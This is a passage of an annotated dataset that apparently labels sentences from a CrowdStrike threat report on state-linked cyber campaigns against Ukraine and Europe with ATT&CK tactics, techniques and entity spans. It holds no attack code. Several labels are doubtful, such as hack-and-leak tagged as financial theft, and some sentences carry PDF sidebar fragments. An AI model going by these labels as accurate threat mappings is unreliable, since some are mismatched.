"crowdstrike-42_crowdstrike_report-p19-s111-2cbf12", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 19, "sentence_id": 111, "context_before": "In early 2025, CrowdStrike OverWatch detected VOODOO BEAR leveraging the POEMGATE secure shell (SSH) backdoor and credential logger in the environments of Ukrainian telecommunications entities.", "sentence_text": "In June 2025, the adversary continued initial access operations delivering fake antivirus program installers containing the Sumbur backdoor, which downloads and executes additional payloads to facilitate long-term persistence.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "The adversary delivered fake antivirus installers embedding the Sumbur backdoor, which downloads and executes additional payloads to establish persistence.", "entities": [ { "text": "Sumbur backdoor", "start": 124, "end": 139, "label": "MalwareTool" }, { "text": "delivering fake antivirus program installers containing the Sumbur backdoor", "start": 64, "end": 139, "label": "Action" }, { "text": "downloads and executes additional payloads", "start": 147, "end": 189, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s112-a42d76", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 112, "context_before": "In June 2025, the adversary continued initial access operations delivering fake antivirus program installers containing the Sumbur backdoor, which downloads and executes additional payloads to facilitate long-term persistence.", "sentence_text": "FSB-Nexus Adversaries Conduct Intelligence Collection and Information Operations", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s113-8642d3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 113, "context_before": "FSB-Nexus Adversaries Conduct Intelligence Collection and Information Operations", "sentence_text": "The targeting priorities for threat actors linked to Russia's FSB have remained consistent since 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s114-cdbcea", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 114, "context_before": "The targeting priorities for threat actors linked to Russia's FSB have remained consistent since 2022.", "sentence_text": "PRIMITIVE BEAR continues to execute high-volume spear-phishing campaigns against Ukrainian government and military organizations, likely to gather intelligence that supports Russia's war aims, such as bolstering its political and military influence.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "execute spear-phishing campaigns to gather intelligence", "entities": [ { "text": "PRIMITIVE BEAR", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "execute", "start": 28, "end": 35, "label": "Action" }, { "text": " gather intelligence", "start": 139, "end": 159, "label": "Action" }, { "text": "high-volume spear-phishing campaigns", "start": 36, "end": 72, "label": "Action" }, { "text": "Ukrainian government and military organizations", "start": 81, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s115-a32d31", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 115, "context_before": "PRIMITIVE BEAR continues to execute high-volume spear-phishing campaigns against Ukrainian government and military organizations, likely to gather intelligence that supports Russia's war aims, such as bolstering its political and military influence.", "sentence_text": "GOSSAMER BEAR conducts credential phishing operations targeting Ukrainian government and military entities as well as U.K. and EU nongovernmental organizations (NGOs).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "conduct credential phishing operations", "entities": [ { "text": "GOSSAMER BEAR", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "conducts", "start": 14, "end": 22, "label": "Action" }, { "text": " phishing", "start": 33, "end": 42, "label": "Action" }, { "text": "targeting ", "start": 54, "end": 64, "label": "Action" }, { "text": "Ukrainian government and military entities", "start": 64, "end": 106, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s116-c90827", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 116, "context_before": "GOSSAMER BEAR conducts credential phishing operations targeting Ukrainian government and military entities as well as U.K. and EU nongovernmental organizations (NGOs).", "sentence_text": "Other Russia-Aligned Activity Clusters Since at least 2017, Russia-aligned activity cluster RepeatingUmbra has targeted AN ACTIVITY CLUSTER IS A GROUPING OF RELATED MALICIOUS Ukrainian government and defense entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s117-301c50", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 117, "context_before": "Other Russia-Aligned Activity Clusters Since at least 2017, Russia-aligned activity cluster RepeatingUmbra has targeted AN ACTIVITY CLUSTER IS A GROUPING OF RELATED MALICIOUS Ukrainian government and defense entities.", "sentence_text": "In 2024 and 2025, the cluster BEHAVIORS THAT SHARE conducted credential phishing campaigns and used multiple variants of their COMMON TOOLS, TECHNIQUES, custom Pryatki downloader to deliver CobaltStrike to Ukrainian targets.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "The adversary conducted credential phishing campaigns and used a custom Pryatki downloader to deliver CobaltStrike to targets.", "entities": [ { "text": "credential phishing campaigns", "start": 61, "end": 90, "label": "Action" }, { "text": "custom Pryatki downloader", "start": 153, "end": 178, "label": "MalwareTool" }, { "text": "deliver CobaltStrike to Ukrainian targets", "start": 182, "end": 223, "label": "Action" }, { "text": "CobaltStrike", "start": 190, "end": 202, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p20-s118-8699e9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 20, "sentence_id": 118, "context_before": "In 2024 and 2025, the cluster BEHAVIORS THAT SHARE conducted credential phishing campaigns and used multiple variants of their COMMON TOOLS, TECHNIQUES, custom Pryatki downloader to deliver CobaltStrike to Ukrainian targets.", "sentence_text": "Similarly, FamishedLibrarian — another likely Russia-nexus activity cluster active since at least November 2022 — relies on relatively unchanged delivery TTPs and continues to make operations security (OPSEC) errors that expose their campaign infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p21-s119-6a3826", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 21, "sentence_id": 119, "context_before": "Similarly, FamishedLibrarian — another likely Russia-nexus activity cluster active since at least November 2022 — relies on relatively unchanged delivery TTPs and continues to make operations security (OPSEC) errors that expose their campaign infrastructure.", "sentence_text": "In 2024 and 2025, numerous Russia- nexus sabotage instances were reported across Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p21-s120-9c3ebc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 21, "sentence_id": 120, "context_before": "In 2024 and 2025, numerous Russia- nexus sabotage instances were reported across Europe.", "sentence_text": "Targeting Ukrainian Allies Russia-aligned threat actors have also targeted European entities for their public support of Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p21-s121-4452fb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 21, "sentence_id": 121, "context_before": "Targeting Ukrainian Allies Russia-aligned threat actors have also targeted European entities for their public support of Ukraine.", "sentence_text": "Meanwhile, between late March 2022 and May 2022, PRIMITIVE BEAR temporarily expanded their targeting from Ukraine to include government entities in Latvia, Moldova, and Lithuania, likely in response to their public support for Kyiv immediately after the invasion.15 Though other pro-Ukraine European governments have also been targeted, likely in part for their support for Ukraine, CrowdStrike Intelligence assesses these broader campaigns are mainly driven by standing intelligence collection requirements (see the Russia-AlignedActivity section on page 26).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p21-s122-8a1c35", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 21, "sentence_id": 122, "context_before": "Meanwhile, between late March 2022 and May 2022, PRIMITIVE BEAR temporarily expanded their targeting from Ukraine to include government entities in Latvia, Moldova, and Lithuania, likely in response to their public support for Kyiv immediately after the invasion.15 Though other pro-Ukraine European governments have also been targeted, likely in part for their support for Ukraine, CrowdStrike Intelligence assesses these broader campaigns are mainly driven by standing intelligence collection requirements (see the Russia-AlignedActivity section on page 26).", "sentence_text": "13 https://www.economist.com/graphic-detail/2025/07/22/russian-sabotage-attacks-surged-across-europe-in-2024\n14 https://www.tv4.se/artikel/5vLIzltKYKnriPm0uJvd1N/saepo-larmar-vaervar-missbrukare-foer-att-utfoera-\nsabotage-i-sverige\nKolumbijczyk-uslyszal-z.html\n15 https://eng.lsm.lv/article/politics/diplomacy/latvian-officials-immediately-condemn-putins-ukraine-invasion.a445051/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s123-c68000", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 123, "context_before": "13 https://www.economist.com/graphic-detail/2025/07/22/russian-sabotage-attacks-surged-across-europe-in-2024\n14 https://www.tv4.se/artikel/5vLIzltKYKnriPm0uJvd1N/saepo-larmar-vaervar-missbrukare-foer-att-utfoera-\nsabotage-i-sverige\nKolumbijczyk-uslyszal-z.html\n15 https://eng.lsm.lv/article/politics/diplomacy/latvian-officials-immediately-condemn-putins-ukraine-invasion.a445051/", "sentence_text": "The alliance reached a high point in October 2024, when the DPRK deployed troops to Russia to aid its war efforts in Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s124-4acfe5", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 124, "context_before": "The alliance reached a high point in October 2024, when the DPRK deployed troops to Russia to aid its war efforts in Ukraine.", "sentence_text": "The DPRK’s increasing military support for Russia coincides with LABYRINTH CHOLLIMA’s targeting of European defense entities in August 2024 and May 2025 as well as VELVET CHOLLIMA’s targeting of European diplomatic entities between March 2025 and August 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s125-9108e0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 125, "context_before": "The DPRK’s increasing military support for Russia coincides with LABYRINTH CHOLLIMA’s targeting of European defense entities in August 2024 and May 2025 as well as VELVET CHOLLIMA’s targeting of European diplomatic entities between March 2025 and August 2025.", "sentence_text": "The leaders of each country’s intelligence agencies have also met several times.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s126-ac4548", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 126, "context_before": "The leaders of each country’s intelligence agencies have also met several times.", "sentence_text": "Since 2022, at least two Russia state-nexus destructive operations primarily targeting Ukrainian entities or capabilities have impacted entities outside of Ukraine, demonstrating the potential for impacts to other European entities.19 One operation involved collateral damage, while the other intentionally targeted Poland, whose government supports Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "conduct destructive operations targeting Ukrainian entities; cause collateral damage; intentionally target Poland", "entities": [ { "text": "targeting", "start": 77, "end": 86, "label": "Action" }, { "text": "destructive operations", "start": 44, "end": 66, "label": "Action" }, { "text": " impacted ", "start": 126, "end": 136, "label": "Action" }, { "text": " intentionally targeted", "start": 292, "end": 315, "label": "Action" }, { "text": "Russia state-nexus", "start": 25, "end": 43, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s127-d476d4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 127, "context_before": "Since 2022, at least two Russia state-nexus destructive operations primarily targeting Ukrainian entities or capabilities have impacted entities outside of Ukraine, demonstrating the potential for impacts to other European entities.19 One operation involved collateral damage, while the other intentionally targeted Poland, whose government supports Ukraine.", "sentence_text": "Unless Western support for Ukraine changes significantly — including if Western military forces become directly involved in operations against Russian forces — Russian threat actors are unlikely to target non-Ukrainian entities in Europe with destructive attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s128-089923", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 128, "context_before": "Unless Western support for Ukraine changes significantly — including if Western military forces become directly involved in operations against Russian forces — Russian threat actors are unlikely to target non-Ukrainian entities in Europe with destructive attacks.", "sentence_text": "However, CrowdStrike Intelligence assesses that the Russian government will likely accept the risk of minor collateral damage to entities outside Ukraine resulting from cyber operations targeting Ukrainian military capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p22-s129-293d7f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 22, "sentence_id": 129, "context_before": "However, CrowdStrike Intelligence assesses that the Russian government will likely accept the risk of minor collateral damage to entities outside Ukraine resulting from cyber operations targeting Ukrainian military capabilities.", "sentence_text": "16 https://assets.korearisk.com/uploads/2025/05/Unlawful-Military-Cooperation-including-Arms-Transfers-between-\nNorth-Korea-and-Russia-MSMT_2025_1-1.pdf\n17 https://www.trellix.com/blogs/research/dprk-linked-github-c2-espionage-campaign/\n18 https://www.dailynk.com/english/n-korea-uses-moscow-security-meeting-to-advance-intelligence-cooperation-\nwith-russia/\n19 https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/\nukraine-and-poland/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p23-s130-af8508", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 23, "sentence_id": 130, "context_before": "16 https://assets.korearisk.com/uploads/2025/05/Unlawful-Military-Cooperation-including-Arms-Transfers-between-\nNorth-Korea-and-Russia-MSMT_2025_1-1.pdf\n17 https://www.trellix.com/blogs/research/dprk-linked-github-c2-espionage-campaign/\n18 https://www.dailynk.com/english/n-korea-uses-moscow-security-meeting-to-advance-intelligence-cooperation-\nwith-russia/\n19 https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/\nukraine-and-poland/", "sentence_text": "Though Iranian cyber activity has primarily focused on Israel-based entities, tense diplomatic relations between Iran and European nations drove a limited number of Iran-nexus threat actors to target European entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p23-s131-0f23ae", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 23, "sentence_id": 131, "context_before": "Though Iranian cyber activity has primarily focused on Israel-based entities, tense diplomatic relations between Iran and European nations drove a limited number of Iran-nexus threat actors to target European entities.", "sentence_text": "As Israel-Iran tensions remain high, Iran-nexus adversaries will likely continue to target Israel and its Western allies involved in the conflict through impersonation efforts and spear-phishing campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "target Israel and Western allies through impersonation and spear-phishing", "entities": [ { "text": "Iran-nexus adversaries", "start": 37, "end": 59, "label": "ThreatActor" }, { "text": "target", "start": 84, "end": 90, "label": "Action" }, { "text": "impersonation efforts", "start": 154, "end": 175, "label": "Action" }, { "text": "spear-phishing", "start": 180, "end": 194, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p23-s132-b2d698", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 23, "sentence_id": 132, "context_before": "As Israel-Iran tensions remain high, Iran-nexus adversaries will likely continue to target Israel and its Western allies involved in the conflict through impersonation efforts and spear-phishing campaigns.", "sentence_text": "Countries Targeted IRAN-NEXUS ADVERSARIES AND PERSONAS:\nCONFLICT: ISRAEL-HAMAS\nBANISHED KITTEN\nBelgium • Handala Hack Team •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p23-s133-219ce2", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 23, "sentence_id": 133, "context_before": "Countries Targeted IRAN-NEXUS ADVERSARIES AND PERSONAS:\nCONFLICT: ISRAEL-HAMAS\nBANISHED KITTEN\nBelgium • Handala Hack Team •", "sentence_text": "Sweden • LulzSec Muslims Switzerland • Tunisian Maskers Cyber Force CONFLICT: ISRAEL-HAMAS •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s134-5940d3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 134, "context_before": "Sweden • LulzSec Muslims Switzerland • Tunisian Maskers Cyber Force CONFLICT: ISRAEL-HAMAS •", "sentence_text": "Intelligence-Gathering Operations\nBetween late July 2025 and mid-August 2025, spear-phishing campaigns — almost certainly conducted by an Islamic Revolutionary Guard Corps (IRGC)-affiliated Iran-nexus threat actor — targeted a U.K.-based academic institution, likely to gather intelligence.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1598.003", "name": "Spearphishing Link" } ], "procedure": "conduct spear-phishing campaigns targeting a U.K.-based academic institution to gather intelligence", "entities": [ { "text": "spear-phishing", "start": 78, "end": 92, "label": "Action" }, { "text": " Islamic Revolutionary Guard Corps (IRGC)", "start": 137, "end": 178, "label": "ThreatActor" }, { "text": "Iran-nexus threat actor ", "start": 190, "end": 214, "label": "ThreatActor" }, { "text": "gather intelligence", "start": 270, "end": 289, "label": "Action" }, { "text": " targeted", "start": 215, "end": 224, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s135-87636d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 135, "context_before": "Intelligence-Gathering Operations\nBetween late July 2025 and mid-August 2025, spear-phishing campaigns — almost certainly conducted by an Islamic Revolutionary Guard Corps (IRGC)-affiliated Iran-nexus threat actor — targeted a U.K.-based academic institution, likely to gather intelligence.", "sentence_text": "The adversary likely used employment-themed messages to lure the victims into downloading and executing AlDente malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "use employment-themed messages to lure victims into downloading and executing AlDente malware", "entities": [ { "text": "The adversary likely", "start": 0, "end": 20, "label": "ThreatActor" }, { "text": " lure", "start": 55, "end": 60, "label": "Action" }, { "text": "AlDente malware", "start": 104, "end": 119, "label": "MalwareTool" }, { "text": "downloading and executing", "start": 78, "end": 103, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s136-4f6f49", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 136, "context_before": "The adversary likely used employment-themed messages to lure the victims into downloading and executing AlDente malware.", "sentence_text": "Although Iran is unlikely to conduct overt disruptive or destructive operations during negotiations, Iran very likely remains focused on intelligence collection as the snapback sanctions process continues.20 Hack-and-Leak Operations Since 2024, Iran-linked cyber groups have increasingly conducted hack-and-leak operations under the guise of inauthentic hacktivist personas (aka faketivists), targeting Israeli entities or entities in countries that publicly support Israel.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "conduct intelligence collection; conduct hack-and-leak operations using fake personas targeting Israeli entities and entities in countries supporting Israel", "entities": [ { "text": "focused", "start": 126, "end": 133, "label": "Action" }, { "text": " intelligence collection ", "start": 136, "end": 161, "label": "Action" }, { "text": " Iran", "start": 100, "end": 105, "label": "ThreatActor" }, { "text": "Iran-linked cyber groups", "start": 245, "end": 269, "label": "ThreatActor" }, { "text": "conducted", "start": 288, "end": 297, "label": "Action" }, { "text": " Hack-and-Leak Operations ", "start": 207, "end": 233, "label": "Action" }, { "text": " hack-and-leak operations", "start": 297, "end": 322, "label": "Action" }, { "text": " targeting", "start": 392, "end": 402, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s137-df0c31", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 137, "context_before": "Although Iran is unlikely to conduct overt disruptive or destructive operations during negotiations, Iran very likely remains focused on intelligence collection as the snapback sanctions process continues.20 Hack-and-Leak Operations Since 2024, Iran-linked cyber groups have increasingly conducted hack-and-leak operations under the guise of inauthentic hacktivist personas (aka faketivists), targeting Israeli entities or entities in countries that publicly support Israel.", "sentence_text": "In July 2025, two Iran-linked cyber groups — pro-IRGC hacktivist group GomnamanTeam and BANISHED KITTEN's HandalaHackTeam persona — claimed responsibility for hack-and-leak operations targeting a U.K.-based Iranian opposition media outlet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s138-16b16b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 138, "context_before": "In July 2025, two Iran-linked cyber groups — pro-IRGC hacktivist group GomnamanTeam and BANISHED KITTEN's HandalaHackTeam persona — claimed responsibility for hack-and-leak operations targeting a U.K.-based Iranian opposition media outlet.", "sentence_text": "The groups claimed to have leaked employees’ PII as well as sensitive emails and files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s139-5874cb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 139, "context_before": "The groups claimed to have leaked employees’ PII as well as sensitive emails and files.", "sentence_text": "This activity was allegedly conducted in response to the outlet’s cooperation with Israeli intelligence agencies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s140-b17561", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 140, "context_before": "This activity was allegedly conducted in response to the outlet’s cooperation with Israeli intelligence agencies.", "sentence_text": "HandalaHack Team’s and GomnamanTeam’s", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s141-6fd945", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 141, "context_before": "HandalaHack Team’s and GomnamanTeam’s", "sentence_text": "July 2025 claims are part of a larger IO campaign likely intended to control information and suppress dissidents outside of Iran as well as damage trust in opposition media at a politically sensitive time for the regime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s142-3bf846", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 142, "context_before": "July 2025 claims are part of a larger IO campaign likely intended to control information and suppress dissidents outside of Iran as well as damage trust in opposition media at a politically sensitive time for the regime.", "sentence_text": "Cyber Disruption Operations", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s143-5fd615", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 143, "context_before": "Cyber Disruption Operations", "sentence_text": "In January 2024, YareGomnam conducted a DDoS attack against a Dutch government news organization and a defense-related organization’s English-language website.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1498", "name": "Network Denial of Service" } ], "procedure": "Conduct a DDoS attack against a Dutch government news organization and a defense-related organization's English-language website.", "entities": [ { "text": "YareGomnam", "start": 17, "end": 27, "label": "ThreatActor" }, { "text": "conducted a DDoS attack", "start": 28, "end": 51, "label": "Action" }, { "text": "English-language website", "start": 134, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s144-c15c3f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 144, "context_before": "In January 2024, likely HAYWIRE KITTEN persona YareGomnam (aka YareGomnamCyberTeam) claimed responsibility for a DDoS attack against a Dutch government news organization and a defense-related organization’s English-language website.", "sentence_text": "YareGomnam stated the DDoS attacks were in response to Dutch participation in the U.S.-led coalition responsible for military strikes against Houthi military sites in Yemen in January 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s145-6608af", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 145, "context_before": "YareGomnam stated the DDoS attacks were in response to Dutch participation in the U.S.-led coalition responsible for military strikes against Houthi military sites in Yemen in January 2024.", "sentence_text": "However, the mid-January 2024 news that a Dutch engineer had assisted Iranian nuclear sabotage in 2007 may have also influenced the group’s targeting priorities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s146-bc5510", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 146, "context_before": "However, the mid-January 2024 news that a Dutch engineer had assisted Iranian nuclear sabotage in 2007 may have also influenced the group’s targeting priorities.", "sentence_text": "Though these attacks predominantly targeted entities within the countries or regions actively engaged in the conflicts, some activity impacted European nations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p24-s147-ba320a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 24, "sentence_id": 147, "context_before": "Though these attacks predominantly targeted entities within the countries or regions actively engaged in the conflicts, some activity impacted European nations.", "sentence_text": "20 https://www.iranintl.com/en/202507268188", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s148-07b4a7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 148, "context_before": "20 https://www.iranintl.com/en/202507268188", "sentence_text": "Hacktivist Entity Regional Activity Between January 2024 and September 2025, pro-Russia hacktivist adversary BOUNTY JACKAL conducted extensive and near-daily DDoS campaigns against European entities in response to military or financial support for Ukraine or perceived Russo-phobic sentiments.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "Conduct extensive and near-daily DDoS campaigns against European entities.", "entities": [ { "text": "BOUNTY JACKAL", "start": 109, "end": 122, "label": "ThreatActor" }, { "text": "conducted extensive and near-daily DDoS campaigns", "start": 123, "end": 172, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s149-37c50f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 149, "context_before": "Hacktivist Entity Regional Activity Between January 2024 and September 2025, pro-Russia hacktivist adversary BOUNTY JACKAL conducted extensive and near-daily DDoS campaigns against European entities in response to military or financial support for Ukraine or perceived Russo-phobic sentiments.", "sentence_text": "The adversary’s targeting was almost certainly largely opportunistic, and they used their DDoSia attack toolkit to coordinate campaigns with their global volunteer network.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "use DDoSia attack toolkit to coordinate campaigns with volunteer network", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "targeting", "start": 16, "end": 25, "label": "Action" }, { "text": " DDoSia attack toolkit", "start": 89, "end": 111, "label": "MalwareTool" }, { "text": " coordinate", "start": 114, "end": 125, "label": "Action" }, { "text": "used", "start": 79, "end": 83, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s150-786b77", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 150, "context_before": "The adversary’s targeting was almost certainly largely opportunistic, and they used their DDoSia attack toolkit to coordinate campaigns with their global volunteer network.", "sentence_text": "Numerous BOUNTY JACKAL campaigns were almost certainly timed to coincide with ongoing elections or protests in Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s151-d051e1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 151, "context_before": "Numerous BOUNTY JACKAL campaigns were almost certainly timed to coincide with ongoing elections or protests in Europe.", "sentence_text": "This highlights the adversary’s broader anti-EU motivations — while still aligned with countries’ perceived support for Ukraine — and desire to gain attention for campaigns by synchronizing attacks with major events in the target geography.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s152-e1e3cc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 152, "context_before": "This highlights the adversary’s broader anti-EU motivations — while still aligned with countries’ perceived support for Ukraine — and desire to gain attention for campaigns by synchronizing attacks with major events in the target geography.", "sentence_text": "Throughout 2024, pro-Russia hacktivist CARR claimed to have conducted numerous DDoS campaigns against European entities in retaliation for Western military and financial support for Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1498", "name": "Network Denial of Service" } ], "procedure": "conduct DDoS campaigns against European entities in retaliation for 